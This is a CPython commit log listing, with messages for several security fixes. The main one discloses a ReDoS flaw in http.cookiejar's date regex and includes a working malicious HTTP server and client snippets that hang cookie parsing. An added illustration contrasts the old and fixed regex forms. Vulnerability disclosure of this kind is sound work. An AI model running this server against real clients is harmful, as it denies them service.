| Commit message | Author | Age | Files | Lines |
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.
The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to
\d+-\w+-\d+(\s*\s*\s*)$
Therefore, a long sequence of spaces can trigger bad performance.
Matching a malicious string such as
LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
caused catastrophic backtracking.
The fix removes ambiguity about which \s* should match a particular
space.
You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.
from http.server import BaseHTTPRequestHandler, HTTPServer

def make_set_cookie_value(n_spaces):
    spaces = " " * n_spaces
    expiry = f"1-c-1{spaces}!"
    return f"b;Expires={expiry}"

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.log_request(204)
        self.send_response_only(204)  # Don't bother sending Server and Date
        n_spaces = (
            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
            if len(self.path) > 1 else
            65506  # Max header line length 65536
        )
        value = make_set_cookie_value(n_spaces)
        for i in range(99):  # Not necessary, but we can have up to 100 header lines
            self.send_header("Set-Cookie", value)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 44020), Handler).serve_forever()
This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :
import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")
The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):
import requests
requests.get("http://localhost:44020/")
* Regression test for http.cookiejar REDoS
If we regress, this test will take a very long time.
* Improve performance of http.cookiejar.ISO_DATE_RE
A string like
"444444" + (" " * 2000) + "A"
could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
(cherry picked from commit 1b779bfb8593739b11cbb988ef82a883ec9d077e)
Co-authored-by: bcaller <bcaller@users.noreply.github.com>
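The ambiguity this commit message describes, as an added illustration that is not part of the commit or of CPython's source: a constructed simplification of the pre-fix pattern shape beside a hardened form that accepts exactly the same strings, with a small timing helper. The pattern names and the helpers `malicious_value`, `timed_match` and `same_results` are assumptions of this example.

```python
import re
import time

# Constructed simplification of the pre-fix LOOSE_HTTP_DATE_RE shape (not
# CPython's source): after the date, three \s* runs separated only by optional
# groups can all consume the same trailing spaces, so a tail the pattern cannot
# accept ("!") makes the engine try every way of splitting the spaces.
AMBIGUOUS_DATE_RE = re.compile(
    r"^(\d+)-(\w+)-(\d+)\s*([A-Za-z]+)?\s*(?:\(\w+\))?\s*$")

# Hardened form accepting exactly the same strings: each inner \s* sits inside
# the optional group with the non-space token it precedes, so only the final
# \s* can own trailing whitespace and every space has one possible owner.
UNAMBIGUOUS_DATE_RE = re.compile(
    r"^(\d+)-(\w+)-(\d+)(?:\s*([A-Za-z]+))?(?:\s*\(\w+\))?\s*$")


def malicious_value(n_spaces):
    """The Expires value shape from the commit message with n_spaces spaces."""
    return "1-c-1" + (" " * n_spaces) + "!"


def timed_match(regex, text):
    """Return (captured groups or None, seconds spent) for regex.match(text)."""
    start = time.perf_counter()
    m = regex.match(text)
    return (m.groups() if m else None), time.perf_counter() - start


def same_results(samples):
    """True when both patterns agree on outcome and groups for every sample."""
    def groups(regex, s):
        m = regex.match(s)
        return m.groups() if m else None
    return all(groups(AMBIGUOUS_DATE_RE, s) == groups(UNAMBIGUOUS_DATE_RE, s)
               for s in samples)


if __name__ == "__main__":
    # Constructed samples: well-formed loose dates plus a short malicious tail.
    samples = ["12-Feb-2020", "12-Feb-2020 GMT", "12-Feb-2020 GMT (UTC)",
               "12-Feb-2020   (UTC)", malicious_value(50)]
    print("patterns agree on all samples:", same_results(samples))
    # Work grows roughly cubically with the space count for the ambiguous
    # pattern, so n stays small here; the hardened pattern stays linear.
    for n in (100, 200, 300):
        _, t_bad = timed_match(AMBIGUOUS_DATE_RE, malicious_value(n))
        _, t_good = timed_match(UNAMBIGUOUS_DATE_RE, malicious_value(n))
        print(f"{n:5d} spaces: ambiguous {t_bad:.4f}s, hardened {t_good:.6f}s")
```

Feeding the hardened pattern the commit message's 2000-space input returns None in linear time, which is the property a regression test for this class of bug should check.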
validation and encoding behavior (GH-16448) (GH-16462)
(cherry picked from commit 7774d7831e8809795c64ce27f7df52674581d298)
Co-authored-by: Jason R. Coombs <jaraco@jaraco.com>
Disallow control chars in http URLs in urllib.urlopen. This addresses a potential security problem for applications that do not sanity check their URLs where http request headers could be injected.
Disable https related urllib tests on a build without ssl (GH-13032)
These tests require an SSL enabled build. Skip these tests when python is built without SSL to fix test failures.
Use http.client.InvalidURL instead of ValueError as the new error case's exception. (GH-13044)
Co-Authored-By: Miro Hrončok <miro@hroncok.cz>
Co-authored-by: Xtreak <tir.karthi@gmail.com>
(GH-12260)
Don't send cookies of domain A without Domain attribute to domain B when domain A is a suffix match of domain B while using a cookiejar with `http.cookiejar.DefaultCookiePolicy` policy. Patch by Karthikeyan Singaravelan.
(cherry picked from commit ca7fe5063593958e5efdf90f068582837f07bd14)
Co-authored-by: Xtreak <tir.karthi@gmail.com>
with debuglevel=1 only the header keys got printed. With
this change the header values get printed as well and the single
header entries get '\n' as a separator.
(cherry picked from commit 936f03e7fafc28fd6fdfba11d162c776b89c0167)
Co-authored-by: Marco Strigl <mstrigl@suse.com>
(cherry picked from commit b36b0a3765bcacb4dcdbf12060e9e99711855da8)
Co-authored-by: ValeriyaSinevich <valeriya.sinevich@phystech.edu>
(cherry picked from commit d5a2377c3d70e4143bcbee4a765b3434e21f683a)
Co-authored-by: Berker Peksag <berker.peksag@gmail.com>
(#4864)
* [3.6] bpo-32297: Few misspellings found in Python source code comments. (GH-4803)
* Fix multiple typos in code comments
* Add spacing in comments (test_logging.py, test_math.py)
* Fix spaces at the beginning of comments in test_logging.py.
(cherry picked from commit 53f7a7c2814fbfd8a29200926601a32fa48bacb3)
regular expression. Deprecation warning is emitted if uses them in the
middle of the regular expression.
The deprecation includes manual creation of SSLSocket and certfile/keyfile
(or similar) in ftplib, httplib, imaplib, smtplib, poplib and urllib.
ssl.wrap_socket() is not marked as deprecated yet.
but not in the expressions. Also, require expressions to begin and end with literal curly braces.
documentation consistent with the code.
consistent with the code.
And most of the tools.
Patch by Emanuel Barry, reviewed by me, Serhiy Storchaka, and
Martin Panter.
The previous attempt to determine the file’s Content-Length gave a false
positive for pipes on Windows.
Also, drop the special case for sending zero-length iterable bodies.
When the body object is a file, its size is no longer determined with
fstat(), since that can report the wrong result (e.g. reading from a pipe).
Instead, determine the size using seek(), or fall back to chunked encoding
for unseekable files.
Also, change the logic for detecting text files to check for TextIOBase
inheritance, rather than inspecting the “mode” attribute, which may not
exist (e.g. BytesIO and StringIO). The Content-Length for text files is no
longer determined ahead of time, because the original logic could have been
wrong depending on the codec and newline translation settings.
Patch by Demian Brecht and Rolf Krahl, with a few tweaks by me.
http.cookie.time2netscape, confirming the netscape cookie format.
confirming the netscape cookie format.
Patch by Susumu Koshiba.
Most fixes to Doc/ and Lib/ directories by Ville Skyttä.
Initial patch by Felix Kaiser.
Based on patch by Philipp Hagemeister. This fixes a regression caused by
revision f4377699fd47.
Patch by Xiang Zhang.
in BaseHTTPRequestHandler
Initial patch by karlcow.
datetime.MAXYEAR
datetime.MAXYEAR
(correcting regression in Python 3.5).
Based on patch by Guido van Rossum.
to ASCII replacements. Removed UTF-8 BOM from Misc/NEWS.
Original patch by Chris Angelico.